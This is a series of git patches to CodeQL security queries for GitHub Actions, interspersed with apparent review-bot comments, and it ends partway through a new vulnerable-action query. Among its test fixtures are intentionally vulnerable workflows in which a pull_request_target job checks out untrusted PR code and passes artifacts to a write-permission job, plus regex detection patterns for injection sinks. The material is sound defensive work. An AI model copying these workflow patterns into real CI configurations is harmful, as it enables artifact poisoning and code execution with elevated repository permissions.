@@ -119,17 +119,17 @@ bindingset[script] predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | regexp = - "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = - trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + - trimQuotes(script.regexpCapture(regexp, 5)) + + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" ) } @@ -146,8 +146,8 @@ predicate blockFileWrite(string script, string cmd, string file, string content, content = script .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") - .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and file = trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and filters = "" diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index ee9f4843470f..fc45b8c041d0 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
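Review bot: The rewritten heredoc-closing line still hardcodes `(EOF)` even though the opening delimiter is now captured as group 4, so a multi-line write that uses any other delimiter (`<<END` … `echo "END" >> $GITHUB_OUTPUT`) never matches; a backreference keeps the existing group numbering, `"((echo|printf)\\s+['|\"]?\\4['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*"`. Coverage is also inconsistent across the three helpers: `singleLineFileWrite` and `blockFileWrite` accept `(echo|printf|write-output)` while `linesFileWrite` accepts only `(echo|printf)`. Finally `cmd = "echo"` is still asserted even when `printf` matched; if any caller compares `cmd`, capture group 2 instead, otherwise document that `cmd` is normalised to `echo` for both.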
@@ -35,7 +35,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 652b97b887f5..f7a9283f8002 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -37,7 +37,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index a67be6e35627..4fe3268c00af 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -44,7 +44,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) From 8ffac2935e609166d772db15342b9084cbd04527 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:22:20 +0200 Subject: [PATCH 435/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7daf7247f259..93f6688d2b41 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
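Review bot: The identical two-line pattern `value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and value.indexOf(var_name) > 0` is now copied into three sinks (EnvPathInjection, EnvVarInjection, OutputClobbering), and the previous commit already had to touch all three to add `printf`; hoist it into Helper.qll as `bindingset[value] predicate isEchoLikeSubstitution(string value) { value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") }` so the next command alias is added once. As a caveat, `indexOf(var_name) > 0` is a substring test, so `$(echo $FOO_BAR)` also satisfies it for `var_name = FOO`. Each enclosing sink class begins before its hunk.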
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.26 +version: 0.1.27 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b844148e7a21..6ceb57f09461 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.26 +version: 0.1.27 groups: [actions, queries] suites: codeql-suites extractor: javascript From ab8dd599b75f77aec1ca76c3f67a2a013d9aebcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 11:45:30 +0200 Subject: [PATCH 436/707] fix(queries): Fix Missing Permissions query If a job is only triggered by `workflow_call`, we dont report any issues since they should be reported on the calling workflows --- .../CWE-275/MissingActionsPermissions.ql | 12 +++++++----- .../workflows/{missing_perms.yml => perms1.yml} | 0 .../CWE-275/.github/workflows/perms2.yml | 16 ++++++++++++++++ .../.github/workflows/{perms.yml => perms3.yml} | 0 .../CWE-275/.github/workflows/perms4.yml | 11 +++++++++++ .../CWE-275/.github/workflows/perms5.yml | 12 ++++++++++++ .../CWE-275/MissingActionsPermissions.expected | 4 +++- 7 files changed, 49 insertions(+), 6 deletions(-) rename ql/test/query-tests/Security/CWE-275/.github/workflows/{missing_perms.yml => perms1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml rename ql/test/query-tests/Security/CWE-275/.github/workflows/{perms.yml => perms3.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index ffb217739c75..d2969b7d6e72 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql 
+++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,13 @@ import actions -from Workflow workflow, Job job +from Job job where - job = workflow.getAJob() and - ( - not exists(workflow.getPermissions()) and - not exists(job.getPermissions()) + not exists(job.getPermissions()) and + not exists(job.getEnclosingWorkflow().getPermissions()) and + // exists a trigger event that is not a workflow_call + exists(Event e | + e = job.getATriggerEvent() and + not e.getName() = "workflow_call" ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml new file mode 100644 index 000000000000..6f7844f17cb2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -0,0 +1,16 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + test: + name: Build and test + runs-on: ubuntu-latest + permissions: {} + steps: + - uses: actions/checkout@v2 + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml new file mode 100644 index 000000000000..16930cfb07c8 --- /dev/null 
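Review bot: The comment `// exists a trigger event that is not a workflow_call` states the mechanics but not the reason, which lives only in the commit message; readers of the query should get it inline, e.g. `// A workflow reachable only via workflow_call runs under the caller's permissions, so missing permissions are reported on the calling workflow instead.` Since the condition is "any non-workflow_call trigger", a workflow with `on: [workflow_call, workflow_dispatch]` is still reported (fixture perms5.yml), which seems right but is worth stating in that comment too. The select message `Actions Job or Workflow does not set permissions` could name what was checked, e.g. `Neither this job nor its workflow sets permissions`.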
+++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml @@ -0,0 +1,11 @@ +on: + workflow_call: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml new file mode 100644 index 000000000000..4353c2804976 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -0,0 +1,12 @@ +on: + workflow_call: + workflow_dispatch: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index c26769a692e9..8f94d0dc45a6 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1,3 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms1.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms2.yml:6:5:10:2 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms5.yml:7:5:10:32 | Job: build | Actions Job or Workflow does not set permissions | From d548aef3e068e35562095e4a119f9434659a46d0 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 16:31:15 +0200 Subject: [PATCH 437/707] feat(queries): Add actions/download-artifact as a source of Artifact Poisoning --- .../security/ArtifactPoisoningQuery.qll | 18 ++++++++--- .../.github/workflows/artifactpoisoning81.yml | 31 +++++++++++++++++++ .../.github/workflows/artifactpoisoning82.yml | 31 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 7 +++++ .../CWE-829/ArtifactPoisoningMedium.expected | 7 +++++ .../UntrustedCheckoutCritical.expected | 6 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 7 files changed, 98 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 541498ae574c..08a49ab1abbf 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -18,11 +18,21 @@ abstract class UntrustedArtifactDownloadStep extends Step { class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { GitHubDownloadArtifactActionStep() { - // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. - // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers this.getCallee() = "actions/download-artifact" and - this.getArgument("run-id").matches("%github.event.workflow_run.id%") and - exists(this.getArgument("github-token")) + ( + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + or + // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step + exists(UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + ) } override string getPath() { diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml new file mode 100644 index 000000000000..7aa190007d8a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml 
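Review bot: The new `or` disjunct never relates the artifact produced by `upload` to the one this step downloads, so in a workflow with several artifacts a `download-artifact` step that consumes an artifact never derived from the checkout is reported too; the new fixtures only exercise the single-artifact case. Consider pairing the two steps, e.g. `upload.getArgument("name") = this.getArgument("name")` with a fallback for downloads that give no `name`, or state in the comment above `exists(UsesStep checkout, UsesStep upload | ...)` that the match is intentionally name-agnostic and why. The disjunct also accepts any `actions/checkout`, not only one whose `ref` comes from the triggering event, so whether the checked-out code is externally influenced is left to whatever the query enforces elsewhere; a sentence in that comment naming where the privilege/trigger condition lives would help the next reader. `GitHubDownloadArtifactActionStep` continues past the hunk (`getPath()`).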
@@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request_target + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml new file mode 100644 index 000000000000..6ae7f482f55f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c987f63115a1..56ec92c54b6c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -42,6 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -58,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 57d7ff9d64b0..da10247f1e0f 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -42,5 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 092a7187951f..93e816fe1f90 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -26,6 +26,12 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 05931dfe3121..9f3e500817a4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -1,3 +1,5 @@ +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2b55d79c93a98f420613999e28475a1f0a9b04ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 18:29:17 +0200 Subject: [PATCH 438/707] feat(queries): Add query to report vulnerable 3rd party actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 38 +++++++++++++++++++ .../CWE-1395/.github/workflows/test1.yml | 23 +++++++++++ .../UseOfKnownVulnerableAction.expected | 9 +++++ .../CWE-1395/UseOfKnownVulnerableAction.qlref | 2 + 4 files changed, 72 insertions(+) create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql create mode 100644 ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql new file mode 100644 index 000000000000..5767619a5ca4 --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql 
@@ -0,0 +1,38 @@
+/**
+ * @name Use of known vulnerable 3rd party action.
+ * @description The workflow is using a known vulnerable 3rd party action.
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 7.5
+ * @precision high
+ * @id actions/vulnerable-action
+ * @tags actions
+ * security
+ * external/cwe/cwe-1395
+ */
+
+import actions
+
+// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate
+from UsesStep step
+where
+ step.getCallee() = "actions/download-artifact" and
+ (
+ step.getVersion() =
+ [
+ "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1",
